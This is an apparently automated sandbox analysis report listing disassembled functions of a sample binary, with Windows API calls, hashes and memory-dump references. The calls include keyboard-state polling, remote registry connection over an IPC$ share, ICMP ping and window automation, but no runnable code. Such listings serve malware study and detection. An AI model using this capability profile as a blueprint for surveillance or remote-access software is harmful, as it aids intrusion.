                                                              • Opcode Fuzzy Hash: 0d6657320d88a40092bcf0e289c386e8156eeb0b488bedc1cf537ffb6830505d
                                                              • Instruction Fuzzy Hash: C6319271900249ABDB219FA0DC89FEF37BDEF89751F1041A9F619D6060EB749784CB24
                                                              Function 00CBEEDC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00CBEEE0
                                                                • Part of subcall function 00C6F27E: timeGetTime.WINMM(?,?,00CBEF00), ref: 00C6F282
                                                              • Sleep.KERNEL32(0000000A), ref: 00CBEF0D
                                                              • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 00CBEF31
                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CBEF53
                                                              • SetActiveWindow.USER32 ref: 00CBEF72
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CBEF80
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CBEF9F
                                                              • Sleep.KERNEL32(000000FA), ref: 00CBEFAA
                                                              • IsWindow.USER32 ref: 00CBEFB6
                                                              • EndDialog.USER32(00000000), ref: 00CBEFC7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: a62d8e6c9a9170aff63c2f4cc8503d2ead64da2e8c329a9e4605a367cfd5d63d
                                                              • Instruction ID: a48d8c3b814bc4fd537a85097100fee5ae79f8fc7b5037e8ce6c0fbef31a5068
                                                              • Opcode Fuzzy Hash: a62d8e6c9a9170aff63c2f4cc8503d2ead64da2e8c329a9e4605a367cfd5d63d
                                                              • Instruction Fuzzy Hash: 1D216D70204344BFEB206FA0ECC9BBA3B6EFB95B45F100424F456DA3A1CB768D419A74
                                                              Function 00CBA86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00CBA8EE
                                                              • SetKeyboardState.USER32(?), ref: 00CBA959
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00CBA979
                                                              • GetKeyState.USER32(000000A0), ref: 00CBA990
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00CBA9BF
                                                              • GetKeyState.USER32(000000A1), ref: 00CBA9D0
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00CBA9FC
                                                              • GetKeyState.USER32(00000011), ref: 00CBAA0A
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00CBAA33
                                                              • GetKeyState.USER32(00000012), ref: 00CBAA41
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00CBAA6A
                                                              • GetKeyState.USER32(0000005B), ref: 00CBAA78
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: cfe88b617bf0817f6bce1c2d6abe226b86322bd015907070c332264bca633957
                                                              • Instruction ID: 2550c4b5132cc72620f3c4261dfdec34274a5a3499c5257ebe5ee680b8410156
                                                              • Opcode Fuzzy Hash: cfe88b617bf0817f6bce1c2d6abe226b86322bd015907070c332264bca633957
                                                              • Instruction Fuzzy Hash: 0951063090478869FB35EBB089507EEBFB49F11340F48858AC4D21B5C2DAA49F4CDB63
                                                              Function 00CB6555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 00CB6571
                                                              • GetWindowRect.USER32(00000000,?), ref: 00CB658A
                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00CB65E8
                                                              • GetDlgItem.USER32(?,00000002), ref: 00CB65F8
                                                              • GetWindowRect.USER32(00000000,?), ref: 00CB660A
                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00CB665E
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00CB666C
                                                              • GetWindowRect.USER32(00000000,?), ref: 00CB667E
                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00CB66C0
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00CB66D3
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CB66E9
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00CB66F6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: f809885d428236b37b495b46b324054d099e1c19ed7e039f9848ae5310a86d71
                                                              • Instruction ID: 0598fc4ea171c64d02717e3c069772fa6b86f8213e67647e3aa8752bb8221640
                                                              • Opcode Fuzzy Hash: f809885d428236b37b495b46b324054d099e1c19ed7e039f9848ae5310a86d71
                                                              • Instruction Fuzzy Hash: 7651F071A00205AFDF18CF68DD95BEEBBB9FB48310F148129F51AE7294D7749E448B50
                                                              Function 00C520D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C521E4: GetWindowLongW.USER32(?,000000EB), ref: 00C521F2
                                                              • GetSysColor.USER32(0000000F), ref: 00C52102
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: 0f95cb9e83fb2da9b9eea9399092d46dd79da387db8a6a9a45ff8f091559c93d
                                                              • Instruction ID: e986703c72e2cfb0e624a7dba832138c69c9ca20a902e1c610f600de5c4d3249
                                                              • Opcode Fuzzy Hash: 0f95cb9e83fb2da9b9eea9399092d46dd79da387db8a6a9a45ff8f091559c93d
                                                              • Instruction Fuzzy Hash: 1C417735100A80AFDF245B289C88B7F37A5AB46332F154645FEB38B2E1C7319E869B14
                                                              Function 00CB0F6E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CB1032
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CB104E
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CB106A
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CB1094
                                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00CB10BC
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CB10C7
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CB10CC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 323675364-22481851
                                                              • Opcode ID: 68cb50e66912feb4b7a3acef8f2a6c0416186d3dc19950f6b18c0f53e386ae9a
                                                              • Instruction ID: 77813ff7b79b7334249efed73bfd5e0c93d6b944a3f648b86531a82286efa44f
                                                              • Opcode Fuzzy Hash: 68cb50e66912feb4b7a3acef8f2a6c0416186d3dc19950f6b18c0f53e386ae9a
                                                              • Instruction Fuzzy Hash: 8B41187681022DABCF11EBA4DC959EEB7B8FF14701F444129F912A7161EB709E48DF50
                                                              Function 00CE48F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CE499A
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00CE49A1
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CE49B4
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00CE49BC
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CE49C7
                                                              • DeleteDC.GDI32(00000000), ref: 00CE49D1
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00CE49DB
                                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00CE49F1
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00CE49FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 522cc613c9f6c38572138a8791419575014d881966ed5578f87d14892b456df3
                                                              • Instruction ID: 223ee7af9699f7a167a3901a27b9b1dbeb637c59fc7eb08346720bc7e04c1f2b
                                                              • Opcode Fuzzy Hash: 522cc613c9f6c38572138a8791419575014d881966ed5578f87d14892b456df3
                                                              • Instruction Fuzzy Hash: 59318E32100295AFDF119FA5DC49FDE3B6DFF09325F100211FA6AAA0A0C735D811DBA4
                                                              Function 00CD458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00CD45B9
                                                              • CoInitialize.OLE32(00000000), ref: 00CD45E7
                                                              • CoUninitialize.OLE32 ref: 00CD45F1
                                                              • _wcslen.LIBCMT ref: 00CD468A
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00CD470E
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CD4832
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00CD486B
                                                              • CoGetObject.OLE32(?,00000000,00CF0B64,?), ref: 00CD488A
                                                              • SetErrorMode.KERNEL32(00000000), ref: 00CD489D
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CD4921
                                                              • VariantClear.OLEAUT32(?), ref: 00CD4935
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                              • String ID:
                                                              • API String ID: 429561992-0
                                                              • Opcode ID: 9f552973681b9f9dd9d9e19060a08b93b80c01cb11acb16825fb5661102bd695
                                                              • Instruction ID: b09ee0ceecc279d24bb7858c392daf0f4bddcf160adebc21ef26d3e268d1b55a
                                                              • Opcode Fuzzy Hash: 9f552973681b9f9dd9d9e19060a08b93b80c01cb11acb16825fb5661102bd695
                                                              • Instruction Fuzzy Hash: 26C132B16043459F8704DF28C884A2BBBE9FF89748F10491EFA9ADB250DB31ED45CB52
                                                              Function 00CC83F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 00CC844D
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CC84E9
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00CC84FD
                                                              • CoCreateInstance.OLE32(00CF0CD4,00000000,00000001,00D17E8C,?), ref: 00CC8549
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CC85CE
                                                              • CoTaskMemFree.OLE32(?,?), ref: 00CC8626
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00CC86B1
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CC86D4
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00CC86DB
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00CC8730
                                                              • CoUninitialize.OLE32 ref: 00CC8736
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                              • String ID:
                                                              • API String ID: 2762341140-0
                                                              • Opcode ID: c2c8ced0481d1f5acc373550461c378244eaf354273cd4ddee6b345586ef03ec
                                                              • Instruction ID: e81322b96e1199b8a0c1b0ad23789f1c214bdbe9b266d9242772a14eebed8a42
                                                              • Opcode Fuzzy Hash: c2c8ced0481d1f5acc373550461c378244eaf354273cd4ddee6b345586ef03ec
                                                              • Instruction Fuzzy Hash: A6C10C75A00209AFDB14DF64C884E9EBBF5FF48315B148498F91ADB261DB30EE85CB50
                                                              Function 00CB0318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CB033F
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00CB0398
                                                              • VariantInit.OLEAUT32(?), ref: 00CB03AA
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CB03CA
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00CB041D
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CB0431
                                                              • VariantClear.OLEAUT32(?), ref: 00CB0446
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00CB0453
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CB045C
                                                              • VariantClear.OLEAUT32(?), ref: 00CB046E
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CB0479
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: 6680f9210b69f78d77669f1bbe0bbc6ce8c0d752aaf9ce64b187eeb10a2f3dab
                                                              • Instruction ID: 88f823109d954cccd7193e8211d402173a404e18dd45e038ebac8d47c51f9097
                                                              • Opcode Fuzzy Hash: 6680f9210b69f78d77669f1bbe0bbc6ce8c0d752aaf9ce64b187eeb10a2f3dab
                                                              • Instruction Fuzzy Hash: 62415475A00219DFCB04DF64D888AEE7BB9FF58345F108069F956AB261CB34EA45CF90
                                                              Function 00CEA8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C52441: GetWindowLongW.USER32(00000000,000000EB), ref: 00C52452
                                                              • GetSystemMetrics.USER32(0000000F), ref: 00CEA926
                                                              • GetSystemMetrics.USER32(0000000F), ref: 00CEA946
                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CEAB83
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CEABA1
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CEABC2
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00CEABE1
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00CEAC06
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CEAC29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                              • String ID:
                                                              • API String ID: 1211466189-3916222277
                                                              • Opcode ID: 669fc2622f35340c4b710f17214f3712b4320df04b87458ff776fc8507cbc2f3
                                                              • Instruction ID: f56d586cc6bad8e3d9c61a767f0702463620997fad291518487b153d74ccdc88
                                                              • Opcode Fuzzy Hash: 669fc2622f35340c4b710f17214f3712b4320df04b87458ff776fc8507cbc2f3
                                                              • Instruction Fuzzy Hash: 95B18731600299EFDF14CF2AC9C57AE7BB2BF44701F198069EC599F295D730AA80CB61
                                                              Function 00CD0EB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00CD0F19
                                                              • inet_addr.WSOCK32(?), ref: 00CD0F79
                                                              • gethostbyname.WSOCK32(?), ref: 00CD0F85
                                                              • IcmpCreateFile.IPHLPAPI ref: 00CD0F93
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CD1023
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CD1042
                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00CD1116
                                                              • WSACleanup.WSOCK32 ref: 00CD111C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: e51dfb973a0cffc900356128ddf0496c411dd6f4496483ffc4598ffe984bbbb6
                                                              • Instruction ID: ac021b09adde4db5c27b625a449d6f47445aa17530663af320ded8418a5a382b
                                                              • Opcode Fuzzy Hash: e51dfb973a0cffc900356128ddf0496c411dd6f4496483ffc4598ffe984bbbb6
                                                              • Instruction Fuzzy Hash: 95918135604241AFD720DF19C485B1ABBE0FF44318F18859AFA698F7A2C731ED85CB91
                                                              Function 00CC8AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 00CC8BB1
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC8BC1
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CC8BCD
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CC8C6A
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC8C7E
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC8CB0
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CC8CE6
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC8CEF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                              • String ID: *.*
                                                              • API String ID: 1464919966-438819550
                                                              • Opcode ID: 5623056e08d01dca7747052f39c36676c924f424465abb092433185f1503b2d9
                                                              • Instruction ID: 4ae742d48296d628ab1a474b587fa2724828e368b94b9a17f9ada0feaef0355a
                                                              • Opcode Fuzzy Hash: 5623056e08d01dca7747052f39c36676c924f424465abb092433185f1503b2d9
                                                              • Instruction Fuzzy Hash: 826128B65043459FCB10EF60C885E9FB3E8FF89310F04891EE99997251DB35EA49CB52
                                                              Function 00CE45A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateMenu.USER32 ref: 00CE45D8
                                                              • SetMenu.USER32(?,00000000), ref: 00CE45E7
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE466F
                                                              • IsMenu.USER32(?), ref: 00CE4683
                                                              • CreatePopupMenu.USER32 ref: 00CE468D
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CE46BA
                                                              • DrawMenuBar.USER32 ref: 00CE46C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
